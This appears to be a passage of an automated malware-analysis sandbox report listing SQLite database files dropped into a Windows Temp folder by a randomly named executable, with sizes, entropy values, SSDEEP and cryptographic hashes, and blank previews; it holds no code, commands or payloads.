                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\kO4bdXkONn

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\kQ1b9ZvXPL

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\krxNDstLN8

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):106496
                                                                                      Entropy (8bit):1.1358696453229276
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                                      MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                                      SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                                      SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                                      SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\lkW7BlCJN1

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\lp3W65fjAl

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\lqwGBSyfCX

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\m21rsQ6lPt

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\mIm1PV0cgn

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                                                                      MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                                                                      SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                                                                      SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                                                                      SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\mMxfIVP41W

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\mPP9yjBxS1

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\nXix0pGdzW

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\nm2hyEJxLc

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\o3lmDc5XWz

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\oMOZV4CgKG

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ogPt8ZHFOO

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\ot4WH62zoE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):49152
                                                                                      Entropy (8bit):0.8180424350137764
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                                      MD5:349E6EB110E34A08924D92F6B334801D
                                                                                      SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                                      SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                                      SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pKV2TyFH9r

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                      Category:dropped
                                                                                      Size (bytes):40960
                                                                                      Entropy (8bit):0.8553638852307782
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pQn1uSEeVQ

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pTWdQsvLBm

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                                                                      Category:dropped
                                                                                      Size (bytes):20480
                                                                                      Entropy (8bit):0.5707520969659783
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                                                                      MD5:9F6D153D934BCC50E8BC57E7014B201A
                                                                                      SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                                                                      SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                                                                      SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pc1mQXKrOE

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pmw1xh39tg

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                                      Category:dropped
                                                                                      Size (bytes):114688
                                                                                      Entropy (8bit):0.9746603542602881
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                                      MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                                      SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                                      SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                                      SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                                      Malicious:false
                                                                                      Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                      C:\Users\user\AppData\Local\Temp\pv1E1HOdZ3

                                                                                      Download File
                                                                                      Process:C:\Program Files (x86)\MSBuild\qvQdgMbCgPRxtGlzSvteAOftUbVX.exe
                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                                                                      Category:dropped
                                                                                      Size (bytes):28672
                                                                                      Entropy (8bit):2.5793180405395284
                                                                                      Encrypted:false
